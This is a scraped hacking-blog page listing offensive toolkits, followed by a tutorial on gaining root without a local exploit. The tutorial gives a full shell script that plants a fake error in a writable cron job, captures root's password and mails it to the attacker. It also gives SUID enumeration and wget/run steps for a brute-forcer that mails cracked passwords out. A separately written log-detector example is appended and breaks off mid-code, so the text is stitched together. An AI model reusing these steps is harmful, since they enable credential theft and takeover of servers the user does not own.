<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/puppy-pl/" rel="nofollow" style="outline: none;">Puppy</a> (Updated UI only)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/lafuzz/" rel="nofollow" style="outline: none;">Lafuzz</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/bunny-pl/" rel="nofollow" style="outline: none;">Bunny</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/leviathan-toolkit/" rel="nofollow" style="outline: none;">Leviathan</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/slowql/" rel="nofollow" style="outline: none;">Slowql</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/raven-py/" rel="nofollow" style="outline: none;">Raven</a> (unreleased/new)</span></li>
</ol>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">For support, contact innosec.tk@gmail.com</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="https://code.google.com/p/hackpak2013/downloads/list" style="outline: none;">Downloads</a> -</span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><a href="https://hackpak2013.googlecode.com/files/hackpak2013-v1.5.zip" style="outline: none;">hackpak2013-v1.5.zip</a></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 20px; margin-top: 20px; max-width: 80em; padding-left: 0.7em; white-space: pre-wrap;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">HackPak2013 version 1.5 includes:
- Newer version of SecScan & Puppy.pl
- Resources such as common tables & columns.
- Raw scripts on unfinished tool for learning.
- Custom exploits</span></pre>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWNMXIoQkNKIh3jQRyKQ_auTuyFKs9d3jnvNQ-PCYV_IVioZSRIafModCk5cptK_TWhQymSqn9UbykMyihIQ_dSkB-YH96U3Bj78uVZgppy4lP2SRzWmG-6d_mkWfTBEFMDj1012jZ52IX/s1600/5bfj9.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWNMXIoQkNKIh3jQRyKQ_auTuyFKs9d3jnvNQ-PCYV_IVioZSRIafModCk5cptK_TWhQymSqn9UbykMyihIQ_dSkB-YH96U3Bj78uVZgppy4lP2SRzWmG-6d_mkWfTBEFMDj1012jZ52IX/s1600/5bfj9.jpg" style="border: none; padding: 0px;" width="395" /></span></span></a></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<a href="https://code.google.com/p/hackpak2013/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/hackpak2013/</span></span></a></div>
</div>
</div>
</div>
Posted by Fahim, 2013-09-02T14:09:00-07:00
Lazy-Kali Bash Script - a bash script for Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ROV2lCv3HWMHizgoHyRYjuyFfWW6Z8vC0OadQVWfQzd2ogdgbGm2WAgHdZD-Meo_qgY2Ne0bxUow8y6bPEI-6sbyac4P3anU0wVsDx0nXGGt4FHnouJAhv37WMa8Cv-PIQkvgIeu162n/s1600/kali-3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; color: black;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ROV2lCv3HWMHizgoHyRYjuyFfWW6Z8vC0OadQVWfQzd2ogdgbGm2WAgHdZD-Meo_qgY2Ne0bxUow8y6bPEI-6sbyac4P3anU0wVsDx0nXGGt4FHnouJAhv37WMa8Cv-PIQkvgIeu162n/s1600/kali-3.jpg" style="border: none; padding: 0px;" width="400" /></span></a></div>
<h1 style="background-image: none; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: x-large; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Lazy-Kali Bash Script</span></h1>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">A bash script for when you feel lazy.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Adds quite a few tools to Kali Linux.</span></div>
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Bleeding Edge Repos</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">AngryIP Scanner</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Terminator</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Xchat</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Unicornscan</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Nautilus Open Terminal</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Simple-Ducky</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Subterfuge</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Ghost-Phisher</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Yamas</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">PwnStar</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Ettercap0.7.6</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Xssf</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Smbexec</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Flash</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Java</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Easy-Creds</span></li>
</ul>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">... and more!</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Lazy-Kali will also update Kali, start the Metasploit services, and start, stop and update OpenVAS.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">This is the first version; the script is self-updating, so more will be added shortly. Requested features will be added where possible.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="https://code.google.com/p/lazykali/downloads/list" style="outline: none;">Download</a>s -</span></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px; outline: none;"><a href="https://lazykali.googlecode.com/files/hackpack.tar.gz" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;">hackpack.tar.gz</a></span></span><br />
<div>
<br /></div>
</div>
Posted by Fahim, 2013-09-02T14:09:00-07:00
Dirscan-node - Web directory scanning tool for pentesters<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Web directory scanning tool, powered by node.js</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">This tool is useful for pentesters to identify interesting web files and directories on the audited site that could open attack vectors against the target.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<h1 style="background-image: none; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Installation</span></h1>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">Install node.js from: <a href="http://nodejs.org/download/" style="outline: none;">http://nodejs.org/download/</a><br /><br />chmod 755 dirscan.js<br /><br />and go!</span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;"><br /><span style="font-family: Georgia, 'Times New Roman', serif;">Usage :</span></span><blockquote style="margin: 20px; max-width: 60em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">./dirscan.js URL Wordlist Extensions</span></blockquote>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">example:</span></div>
<blockquote style="margin: 20px; max-width: 60em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">./dirscan.js <a href="http://site.com/" rel="nofollow" style="outline: none;">http://site.com/</a> wordlists/dirs.txt '.php,.sql'</span></blockquote>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Details" style="outline: none;"></a>Details</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Main features:</span></div>
<ul style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">wordlist based scan</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">recursive web scanning</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">multiple extensions</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">directory listing support</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">full detailed output</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">colored output</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">follow same-origin redirects</span></li>
</ul>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="TODO" style="outline: none;"></a>TODO</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">To develop:</span></div>
<ul style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">autodetect extensions</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">404 page identification</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">html crawl</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">timing measurement</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">use the cluster lib to take advantage of multiple cores</span></li>
</ul>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Thanks" style="outline: none;"></a>Thanks</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The wordlist is based on dirb's wordlist, with extra words that have proved successful in pentests.</span></div>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Disclaimer" style="outline: none;"></a>Disclaimer</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Warning: this tool can degrade the remote site's performance; use with caution.</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">This tool is only for:</span></div>
<ul style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">educational purposes</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">authorized pentests</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">self-audits for admins</span></li>
</ul>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Issues" style="outline: none;"></a>Issues</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">If you get "Error: connect EMFILE", you must increase the open files limit:</span></div>
<ol style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">ulimit -n 9000</span></li>
</ol>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div>
<a href="https://code.google.com/p/dirscan-node/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/dirscan-node/</span></span></a></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7skfwZUzvtCiCN2tzRaorkhVCA_mOExvvOqgh3YKbRY0x6LARkVZfSubm5CoQaexaaLl1fr6nId-BdfB8DFKALjZzS3q-U4K5HTp0gTIbGUpiDC6C1OXS-ZCbqTtesmHjlpmnZ20GCYrx/s1600/dirscan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7skfwZUzvtCiCN2tzRaorkhVCA_mOExvvOqgh3YKbRY0x6LARkVZfSubm5CoQaexaaLl1fr6nId-BdfB8DFKALjZzS3q-U4K5HTp0gTIbGUpiDC6C1OXS-ZCbqTtesmHjlpmnZ20GCYrx/s1600/dirscan.png" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
</div>
</div>
Posted by Fahim, 2013-09-02T14:06:00-07:00
Root Server Without Local Root Exploit<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Many hackers find it difficult to find a local root exploit for rooting a server. So here are a few methods you could try to gain root access without using a local root exploit!</span></div>
<h2 style="font-family: Arial, Verdana; line-height: 19px;">
<span style="background-color: white;">1. Custom Cron Tab Scripts</span></h2>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Cron jobs are tasks set to be executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write to this File, we can send a “Fake” Error Message and the Root user will probably type in his password.</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">First, check out if there are any Cron Job Tasks:</span></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;"> crontab -l </span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">If you see any Custom Script, we must check whether we can Write to it.</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Let’s say we got a Custom script here: <b>/bin/cronscript</b></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<strong style="background-color: white;">To check if we can Write to the File, type:</strong></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;"> stat /bin/cronscript

 (If you get something like: "-rwxrwxrwx" in the output, you can edit the File!) </span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Let’s edit the file and send a <span style="text-decoration: underline;">Fake Error Message.</span></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><strong>Make a Copy </strong>of the Original Script to <b>/bin/cronscript.bak </b>:</span></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;"> cp /bin/cronscript /bin/cronscript.bak </span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><strong>Edit the </strong><b>/bin/cronscript </b><strong>like this:</strong></span></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">#!/bin/sh
echo "A System Error Occurred!"
echo ""
echo "Error Code: #131425"
echo ""
echo "Update to get the Latest Patch for this Security Issue."
read -s -p "[sudo] password for root " rootpasswd
echo ""
echo "su: Authentication failure"
echo ""
sudo apt-get update && sudo apt-get upgrade
sudo echo "The Password is: $rootpasswd" > .kod
mail -s "Root's Password" "<span style="text-decoration: underline;">email@address.com</span>" < .kod
rm .kod
mv <span style="text-decoration: underline;"><b>cronscript.bak cronscript</b></span></span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">You should just Replace the <span style="text-decoration: underline;">Underlined</span> with your <strong>E-Mail and the Name of the Script!</strong></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">After you save the File, type: <b>chmod +x cronscript </b> <strong>to set it as Executable!</strong></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<strong style="background-color: white;">This script will:</strong></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Send a Fake Error Message</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Request for the Root’s Password</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Send the Password to your E-Mail Address <b>(make sure the <strong>mail</strong> command exists in <strong>/bin</strong>)</b></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Restore the Original File</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">When the Script gets Executed, the Root User will Enter his Password and it will be sent to you!</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">It would be better if you had some knowledge on Bash Programming…</b></div>
<h2 style="font-family: Arial, Verdana; line-height: 19px;">
<span style="background-color: white;">2. Enumerating all SUID Files</span></h2>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">An SUID File is any file that any User group has the Privileges to Access, Read and Write to.<br /><strong>What does this mean for you: </strong> You can Escalate Privileges in this way, if it is in an Important Directory.<br />You can Social-Engineer a Privileged User.</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">To find all SUID Files, type:</span></div>
<pre style="font-size: 13px; line-height: 19px;"><b style="background-color: white;"> find / -user root -perm -4000 -print </b></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">This will list all the SUID Files in your Terminal. <strong>Take your time and check them, as they can help you to escalate Privileges!</strong></span></div>
<h2 style="font-family: Arial, Verdana; line-height: 19px;">
<span style="background-color: white;">3. Brute Forcing</span></h2>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">I know what you are thinking after seeing the title, but this is different: the tool we are going to use is called <b>Rootdabitch</b>.</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">What is so special in this?</b></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">The magic of this tool is that it works in the background, so you can leave it running for days until you have results... when the password is cracked it will be mailed to you :)</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">For this you need a PHP shell, a reverse shell or SSH access to the target to run the tool. You can get the tool here: <a href="http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip" style="outline: none; text-decoration: none;"><b>Rootdabitch v0.1</b></a></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">Usage:</b></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">./rootdabitch.sh youremail@site.com</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">For kiddies:</b></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">First, download Rootdabitch to the server:</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<span style="background-color: white; font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">Extract it with the following command:</span><br />
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">unzip rootdabitch-0.1.zip</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<span style="background-color: white; font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">Chmod it to 755:</span><br />
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">chmod 755 rootdabitch.sh</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<span style="background-color: white; font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">Finally, run the script:</span><br />
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">./rootdabitch.sh youremail@site.com</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Simply chmod it and run the script. If the password is cracked you will get a mail containing the root password, which will be in the file "passwords.txt" attached to the mail.</span></div>
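<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">A guesser that runs for days on the box, as described above, is loud in one place: every wrong password handed to <code>su</code> or <code>sudo</code> is logged by pam_unix as an "authentication failure" line in the auth log. The following is an added example, not code from the page or from the Rootdabitch project: a small sliding-window detector that parses such lines and raises an alert when one local account racks up repeated failures against the same target user within a short window. The log excerpt, host name, PIDs and account names are constructed for the demo; the regular expression matches the standard pam_unix line format.</span></div>

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample /var/log/auth.log excerpt (not taken from the page or any
# real host): a web-server account repeatedly failing `su` to root, one
# unrelated successful sudo session, and a single stray failure by a real user.
SAMPLE_LOG = """\
Sep  2 13:45:01 web01 su[4101]: pam_unix(su:auth): authentication failure; logname=www-data uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost=  user=root
Sep  2 13:45:02 web01 su[4102]: pam_unix(su:auth): authentication failure; logname=www-data uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost=  user=root
Sep  2 13:45:02 web01 sudo: pam_unix(sudo:session): session opened for user root by alice(uid=0)
Sep  2 13:45:03 web01 su[4103]: pam_unix(su:auth): authentication failure; logname=www-data uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost=  user=root
Sep  2 13:45:03 web01 su[4104]: pam_unix(su:auth): authentication failure; logname=www-data uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost=  user=root
Sep  2 13:45:04 web01 su[4105]: pam_unix(su:auth): authentication failure; logname=www-data uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost=  user=root
Sep  2 13:50:00 web01 su[4200]: pam_unix(su:auth): authentication failure; logname=alice uid=1000 euid=0 tty=/dev/pts/1 ruser=alice rhost=  user=root
"""

# pam_unix writes one "authentication failure" line per wrong password, for
# su, sudo, login and sshd alike; the fields we key on are ruser and user.
FAILURE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (?P<service>\w+)\[\d+\]: "
    r"pam_unix\(\w+:auth\): authentication failure; .*?ruser=(?P<ruser>\S*) "
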